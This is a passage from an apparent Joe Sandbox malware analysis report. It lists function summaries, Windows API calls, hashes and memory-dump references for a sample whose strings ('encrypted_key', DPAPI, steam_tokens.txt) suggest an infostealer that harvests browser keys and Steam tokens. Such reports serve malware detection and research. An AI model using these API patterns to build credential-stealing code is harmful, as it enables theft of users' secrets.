                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$CloseFileNext
                              • String ID:
                              • API String ID: 1875835556-0
                              • Opcode ID: 6a23ae4e1f8a05cebaaa1a642f9bc65d65907758c72249c18442a33fa10e44ae
                              • Instruction ID: b066cb838690a8c7b7cd1da1db65f772d920227011f093b0096e1287d8f81a24
                              • Opcode Fuzzy Hash: 6a23ae4e1f8a05cebaaa1a642f9bc65d65907758c72249c18442a33fa10e44ae
                              • Instruction Fuzzy Hash: 1802EA70A012158FDF68CF19C58AB65BBE5BF44714F1DC1ADD8499B2A2D736DC82CB80
                              Function 005A8470 Relevance: 10.6, APIs: 7, Instructions: 145stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A84C5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A84FC
                              • lstrlen.KERNEL32(00000000), ref: 005A8542
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A8575
                              • lstrlen.KERNEL32(00000000), ref: 005A858B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A85BA
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A85CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 14539a4ccc2e825d509f327939a5684d64ffd20ec69be8cb6b739c25b4c06533
                              • Instruction ID: 809c35c32c8d1c49a26ada93274b4ee3a8982dbdc4d635c2caacaebe16e47bee
                              • Opcode Fuzzy Hash: 14539a4ccc2e825d509f327939a5684d64ffd20ec69be8cb6b739c25b4c06533
                              • Instruction Fuzzy Hash: AD516D75900206ABCB24DF68D884A6BBBF8FF89710F18845DEC45DB255EB34ED41CB54
                              Function 00598880 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005988B3
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx$xY$xY
                              • API String ID: 2002836212-1807622900
                              • Opcode ID: c77a94cb8ccfdf85a5c07a7e2dbdcd0f83cbecb97f7b601e7ff19a9b7e59fffd
                              • Instruction ID: 6a81db55b295f40dd0ca7159397d9b8f72e31ea45bf7b0db95f6de39e2aa862d
                              • Opcode Fuzzy Hash: c77a94cb8ccfdf85a5c07a7e2dbdcd0f83cbecb97f7b601e7ff19a9b7e59fffd
                              • Instruction Fuzzy Hash: C63146B5E005159BCF08DF58C8916ADBBB6FB89350F188269E915EB385DB30AD01CBD1
                              Function 005B28B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 005B28C5
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B28CC
                              • RegOpenKeyExA.ADVAPI32(80000002,015FC858,00000000,00020119,005B2849), ref: 005B28EB
                              • RegQueryValueExA.ADVAPI32(005B2849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 005B2905
                              • RegCloseKey.ADVAPI32(005B2849), ref: 005B290F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 3c691f6d5b6419b6d65e6f5f7486cfe9cc0fee959efc8c21ba428cfd6e0ef707
                              • Instruction ID: 9b17bba56cb3bd7290d3260fb8f53c495628bc78b07782bc67611ff2dbe89c5b
                              • Opcode Fuzzy Hash: 3c691f6d5b6419b6d65e6f5f7486cfe9cc0fee959efc8c21ba428cfd6e0ef707
                              • Instruction Fuzzy Hash: C601BC75600219ABE310CBA09C59FEB7BBCEB48701F10809DFE49D7240EA34698487A4
                              Function 005B2820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 005B2835
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B283C
                                • Part of subcall function 005B28B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 005B28C5
                                • Part of subcall function 005B28B0: RtlAllocateHeap.NTDLL(00000000), ref: 005B28CC
                                • Part of subcall function 005B28B0: RegOpenKeyExA.ADVAPI32(80000002,015FC858,00000000,00020119,005B2849), ref: 005B28EB
                                • Part of subcall function 005B28B0: RegQueryValueExA.ADVAPI32(005B2849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 005B2905
                                • Part of subcall function 005B28B0: RegCloseKey.ADVAPI32(005B2849), ref: 005B290F
                              • RegOpenKeyExA.ADVAPI32(80000002,015FC858,00000000,00020119,005A9560), ref: 005B2871
                              • RegQueryValueExA.ADVAPI32(005A9560,0160E448,00000000,00000000,00000000,000000FF), ref: 005B288C
                              • RegCloseKey.ADVAPI32(005A9560), ref: 005B2896
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 62ca9486074599755ef1a34ed80d7972772b18e5de461bedcc9f4e692f501e40
                              • Instruction ID: 2fc1885e4b14bb6229ce5a6f0a7a32fbb6f227af8c69d35f368a9d2eba58630e
                              • Opcode Fuzzy Hash: 62ca9486074599755ef1a34ed80d7972772b18e5de461bedcc9f4e692f501e40
                              • Instruction Fuzzy Hash: BB01A271600209BBD7509BA4EC4DFEA7B7CEB44311F00819DFE08D6250EA74A98187A9
                              Function 005B2380 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 234stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B23CC
                              • lstrlen.KERNEL32(00000000), ref: 005B2469
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B24F0
                              • lstrlen.KERNEL32(00000000), ref: 005B24F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID: JZ$a&[
                              • API String ID: 2001356338-2897072212
                              • Opcode ID: 72d6c135cfd8559b6e00290fec5aea903a20865eeebdb51677c77a355ac19aaa
                              • Instruction ID: 6f1fa26240a110084c0cad860a9002c530360fa74e55de18683ba0af3655963c
                              • Opcode Fuzzy Hash: 72d6c135cfd8559b6e00290fec5aea903a20865eeebdb51677c77a355ac19aaa
                              • Instruction Fuzzy Hash: CE81C370E0020A9BDF14DF95DC49BEEBBB5BF84310F18816DE508A7281EB75AD41CBA5
                              Function 00597130 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 0059717E
                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 005971B9
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005971C0
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00597203
                              • HeapFree.KERNEL32(00000000), ref: 0059720A
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00597269
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                              • String ID:
                              • API String ID: 174687898-0
                              • Opcode ID: afcf870080634d1d88006b5f70e4aa2cbd6f72a1e58a937d66e0e2a446da2b77
                              • Instruction ID: ef7521b13255f0960e8eaef1d837f03a18001b89f2f865693a571319e8baf060
                              • Opcode Fuzzy Hash: afcf870080634d1d88006b5f70e4aa2cbd6f72a1e58a937d66e0e2a446da2b77
                              • Instruction Fuzzy Hash: C9416B7571570A9BEF20CFA9D884BAAB7E8FB88305F1445AAE849C7300E735E8408B50
                              Function 00599CD0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00599D08
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00599D3A
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00599D63
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2746078483-738592651
                              • Opcode ID: 9099a28b81442c52ec5478c7939a7e19392e3e25e190e14ec0ca8dd784cb4a8f
                              • Instruction ID: 4982ff92c8b677c730ba088f14b01a14ea566bd7a4130d42991495fc8b6a5a7d
                              • Opcode Fuzzy Hash: 9099a28b81442c52ec5478c7939a7e19392e3e25e190e14ec0ca8dd784cb4a8f
                              • Instruction Fuzzy Hash: 2F418271A0130AABDF10EFA8CC89AAE7FB4FF84700F44456DE958A7252DA30ED45C791
                              Function 005AEB40 Relevance: 9.1, APIs: 6, Instructions: 113stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005AEB8B
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AEBC0
                              • lstrcat.KERNEL32(?,00000000), ref: 005AEBCC
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AEBE3
                              • lstrcat.KERNEL32(?,016096C8), ref: 005AEBF4
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AEC04
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 60db6cae15ceb8a7efe9387228feb81daba717c4bc8deeb42f1c7249c9aaeec0
                              • Instruction ID: 635407387bfc8f2db836b03b0b9a493fac1b8297bc843d55cb355cee3bac4aa8
                              • Opcode Fuzzy Hash: 60db6cae15ceb8a7efe9387228feb81daba717c4bc8deeb42f1c7249c9aaeec0
                              • Instruction Fuzzy Hash: C141BB71514205AFC750EF64DC4AEDE7BA4FFC8700F40C82DBA5987291DE34D9458B96
                              Function 005AEE10 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AEE3F
                              • lstrlen.KERNEL32(00000000), ref: 005AEE4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AEE74
                              • lstrlen.KERNEL32(00000000), ref: 005AEE7B
                              • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 005AEEAF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: steam_tokens.txt
                              • API String ID: 367037083-401951677
                              • Opcode ID: adcdbc3219cf1abf725433a37352dea905e1a5969c781642f8f1abac61f99217
                              • Instruction ID: 27eb8473eb921ac1c3d919647597a217b0d22630cf5dc8303f8988e9033f39d4
                              • Opcode Fuzzy Hash: adcdbc3219cf1abf725433a37352dea905e1a5969c781642f8f1abac61f99217
                              • Instruction Fuzzy Hash: 73316D31A1251A6BCB21BF78DC4EA9F7FA8FF81B00F444024B944DB212EA34DD4687D1
                              Function 00599AE0 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,005912EE), ref: 00599AFA
                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,005912EE), ref: 00599B10
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,005912EE), ref: 00599B27
                              • ReadFile.KERNEL32(00000000,00000000,?,005912EE,00000000,?,?,?,005912EE), ref: 00599B40
                              • LocalFree.KERNEL32(?,?,?,?,005912EE), ref: 00599B60
                              • CloseHandle.KERNEL32(00000000,?,?,?,005912EE), ref: 00599B67
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
